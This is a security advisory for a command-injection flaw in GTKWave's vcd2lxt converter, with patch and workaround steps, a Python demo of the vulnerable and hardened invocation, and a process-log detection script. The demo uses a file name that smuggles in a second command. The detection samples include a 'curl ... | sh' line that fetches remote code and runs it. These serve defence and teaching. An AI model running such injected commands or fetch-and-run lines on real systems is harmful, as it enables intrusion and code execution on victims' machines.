CVE-2023-35964

CVSS 7.8 (HIGH)

📋 TL;DR

This CVE is an OS command injection in the decompression functionality of GTKWave's vcd2lxt utility. A specially crafted wave file causes a shell command to be built from attacker-controlled input, so whoever converts or opens the file has arbitrary commands run with their own privileges. The attacker needs no network access to the target; they only need a victim to process the file. Users of GTKWave 3.3.115 who handle wave files from untrusted sources are affected.

💻 Affected Systems

Products:
  • GTKWave
Versions: 3.3.115
Operating Systems: Linux, Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: vcd2lxt converts VCD dumps to the LXT format and decompresses compressed input on the way; the injection sits in that decompression path, so any run of vcd2lxt over an untrusted wave file is exposed, whether the tool is called by hand, from a script, or from a build flow.
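The bug class behind this CVE is a file name interpolated into a shell command string that is then handed to the shell (in C, sprintf() followed by popen()). The following is an added illustration of that pattern beside its hardened form; it is not GTKWave's code, and the function names, the use of `cat` as a stand-in for `gzip -cd`, and the sample file name are all assumptions made for the demonstration:

```python
"""Shell-string vs argv invocation of an external decompressor.

Illustrative code, not GTKWave's: it shows the class of bug (a file name
pasted into a shell command string) and the hardened form (argv list, no
shell). The demo uses `cat` in place of `gzip -cd` so it runs anywhere.
"""
import os
import shutil
import subprocess
import tempfile

# Characters that let the shell start a second command or a substitution.
SHELL_META = set(";|&`$<>(){}\n")


def unsafe_command(fname: str, tool: str = "gzip -cd") -> str:
    """Vulnerable pattern: the file name is interpolated into a shell string,
    which is what C code does with sprintf()+popen(). Any metacharacter in
    the name is interpreted by /bin/sh, so 'a.vcd.gz; id' runs `id`."""
    return f"{tool} {fname}"


def safe_argv(fname: str, tool: tuple = ("gzip", "-cd")) -> list:
    """Hardened pattern: an argv list executed without a shell. The name is
    one argument whatever it contains; '--' ends option parsing so a name
    beginning with '-' cannot be read as a flag."""
    return [*tool, "--", fname]


def is_shell_safe(fname: str) -> bool:
    """Defence-in-depth check for code that cannot drop the shell."""
    return not (SHELL_META & set(fname))


def run_unsafe(fname: str, tool: str) -> str:
    """Run the shell-string form and return its stdout."""
    return subprocess.run(unsafe_command(fname, tool), shell=True,
                          capture_output=True, text=True).stdout


def run_safe(fname: str, tool: tuple) -> str:
    """Run the argv form (no shell) and return its stdout."""
    return subprocess.run(safe_argv(fname, tool),
                          capture_output=True, text=True).stdout


def demo() -> tuple:
    """Create a file whose *name* carries a payload (constructed sample), then
    read it both ways. Returns (shell-string output, argv output)."""
    workdir = tempfile.mkdtemp()
    try:
        payload = os.path.join(workdir, "trace.vcd; echo pwned")
        with open(payload, "w") as fh:
            fh.write("hello\n")
        return run_unsafe(payload, "cat"), run_safe(payload, ("cat",))
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    unsafe_out, safe_out = demo()
    print("shell string:", repr(unsafe_command("trace.vcd; echo pwned", "cat")))
    print("shell-string output:", repr(unsafe_out))   # 'pwned\n': injected echo ran
    print("argv output:        ", repr(safe_out))     # 'hello\n': file read as intended
```

With the shell-string form the injected `echo pwned` executes and the intended read fails (the shell sees two commands); with the argv form the same name is passed as a single argument and the file is read. The allowlist check is only a fallback: the fix is to stop invoking a shell at all.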

📦 What is this software?

GTKWave is an open-source waveform viewer for digital simulation dumps (VCD, LXT, FST and related formats), widely used in FPGA and ASIC development. vcd2lxt is one of the command-line converters that ship with it.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the user running GTKWave, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Arbitrary command execution in the context of the user who opens or converts the malicious file (the bug is not itself a privilege escalation), leading to data exfiltration or malware installation on that workstation.

🟢

If Mitigated

Limited impact when the tool runs as an unprivileged user, inside a sandbox or container, and only on wave files whose origin is known.

🌐 Internet-Facing: LOW
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: No (requires a user to open or convert the file)
Complexity: LOW

Exploitation requires user interaction (opening or converting a malicious file); the detailed technical analysis is in the Cisco Talos report.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.3.116 or later

Advisory (Debian LTS): https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html

Restart Required: No

Instructions:

1. Check the current GTKWave version with `gtkwave --version`.
2. Update to version 3.3.116 or later from the official repositories or the upstream release.
3. Verify the update: the version string should read 3.3.116 or later. On distributions that backport fixes, the upstream version number alone may not show the fix; check the package changelog or the distribution advisory instead.

🔧 Temporary Workarounds

Disable vcd2lxt utility

Platform: linux

Remove execute permission from the vcd2lxt binary so it cannot be run on untrusted input (locate it with `command -v vcd2lxt` if it is not in /usr/bin). This only blocks the vcd2lxt entry point, and a package upgrade or reinstall will restore the permission, so it is a stopgap, not a substitute for the patch.

sudo chmod -x /usr/bin/vcd2lxt

Use file validation

Platform: all

Only open or convert wave files from trusted sources, and keep them under file names containing only letters, digits, '.', '_' and '-' until the fix is in place; there is no format check that reliably identifies a malicious file, so source control is the real control here.

🧯 If You Can't Patch

  • Run GTKWave with minimal user privileges (non-root/non-admin)
  • Use application sandboxing or containerization to limit potential damage

🔍 How to Verify

Check if Vulnerable:

Check whether the installed GTKWave version is 3.3.115 (`gtkwave --version`), or query the package manager for the installed gtkwave package version.

Check Version:

gtkwave --version

Verify Fix Applied:

Confirm the version is 3.3.116 or later (`gtkwave --version`); on a distribution that backports fixes, confirm from the package changelog that the fix for CVE-2023-35964 is included.

📡 Detection & Monitoring

Log Indicators:

  • Child processes of gtkwave or vcd2lxt other than a shell running a decompressor (gzip, bzip2, xz)
  • Shell control characters (';', '|', '&', '`') in the command line of a process spawned by vcd2lxt or gtkwave

Network Indicators:

  • Unexpected outbound connections from GTKWave processes

SIEM Query:

Process creation where the parent image is gtkwave or vcd2lxt and the child command line contains shell control characters such as ';', '|', '&' or '`'; also alert on children of those parents that are not a shell or one of the expected decompressors. Because the injected command runs through a shell, its own children will have the shell as parent, so match on the process ancestry rather than the immediate parent where the SIEM supports it.
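The query above as working detection logic, run over constructed process-creation events. This is an added example, not a vendor rule: the key=value event format, the field names (ts, host, parent_image, image, cmdline), the sample events and the allowlist of expected child images are all assumptions.

```python
"""Flag process-creation events consistent with command injection out of
GTKWave's converters. Added example over constructed log lines; the event
format, field names and allowlist are assumptions, not vendor telemetry."""
import os
import re

# Parents whose children are scrutinised.
WATCHED_PARENTS = ("gtkwave", "vcd2lxt")
# What a legitimate decompression path would spawn (assumed allowlist:
# a POSIX shell running a stock decompressor).
EXPECTED_CHILDREN = {"sh", "dash", "bash", "gzip", "bzip2", "xz"}
# Shell control operators and command substitution.
META_RE = re.compile(r"[;|&`]|\$\(")
# key="value" pairs, as in the constructed events below.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample events (not real telemetry): one benign decompression,
# one injected command chain, one odd child of the viewer, one unrelated parent.
SAMPLE_EVENTS = [
    'ts="2024-04-03T10:15:01Z" host="eda-ws1" parent_image="/usr/bin/vcd2lxt" '
    'image="/bin/sh" cmdline="sh -c gzip -cd /home/u/dump.vcd.gz"',
    'ts="2024-04-03T10:15:02Z" host="eda-ws1" parent_image="/usr/bin/vcd2lxt" '
    'image="/bin/sh" cmdline="sh -c gzip -cd /home/u/dump.vcd.gz; curl http://198.51.100.7/x | sh"',
    'ts="2024-04-03T10:16:40Z" host="eda-ws1" parent_image="/usr/bin/gtkwave" '
    'image="/usr/bin/python3" cmdline="python3 -c import socket"',
    'ts="2024-04-03T10:17:00Z" host="eda-ws1" parent_image="/usr/bin/firefox" '
    'image="/bin/sh" cmdline="sh -c a; b"',
]


def parse_event(line: str) -> dict:
    """Turn one key="value" log line into a dict."""
    return dict(FIELD_RE.findall(line))


def classify(ev: dict) -> list:
    """Return the reasons an event is suspicious (empty list if it is not)."""
    parent = os.path.basename(ev.get("parent_image", ""))
    if not any(name in parent for name in WATCHED_PARENTS):
        return []
    reasons = []
    if META_RE.search(ev.get("cmdline", "")):
        reasons.append("shell metacharacters in child command line")
    child = os.path.basename(ev.get("image", ""))
    if child not in EXPECTED_CHILDREN:
        reasons.append(f"unexpected child process {child!r}")
    return reasons


def scan(lines) -> list:
    """Scan raw lines; return (timestamp, cmdline, reasons) for each hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.get("ts", "?"), ev.get("cmdline", ""), reasons))
    return hits


if __name__ == "__main__":
    for ts, cmdline, reasons in scan(SAMPLE_EVENTS):
        print(ts, "|", cmdline, "|", "; ".join(reasons))
```

Two of the four constructed events fire: the injected `gzip ...; curl ... | sh` chain (metacharacters) and the python3 child of gtkwave (not on the allowlist); the benign decompression and the unrelated firefox event do not. A legitimate file name that itself contains '&' or ';' would also fire on the metacharacter rule, which is acceptable for a tool that should never see such names, and the `curl` and second `sh` spawned by the injected chain have the shell as parent, so a production rule should walk the ancestry rather than stop at the immediate parent.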
